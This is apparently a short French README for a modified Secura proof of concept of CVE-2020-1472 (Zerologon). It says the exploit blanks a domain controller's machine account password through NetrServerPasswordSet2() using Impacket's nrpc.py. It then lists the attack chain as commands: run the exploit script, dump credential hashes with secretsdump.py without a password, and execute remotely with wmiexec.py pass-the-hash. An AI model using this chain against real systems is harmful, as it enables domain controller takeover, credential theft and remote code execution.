
Modifié le PoC de test de Secura, CVE-2020-1472, pour changer le mot de passe de la machine à null.
Modifié le PoC de test de Secura, CVE-2020-1472, afin de modifier le mot de passe de la machine pour le mettre à null. Le changement de mot de passe sur la machine utilise la fonction NetrServerPasswordSet2() de Microsoft. Cet exploit tire parti du module nrpc.py d'Impacket pour appeler NetrServerPasswordSet2().
./zerologon_NULLPASS.py <dc-name> <dc-ip>

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

wmiexec.py -hashes <LM:NT> <username>@<ip>
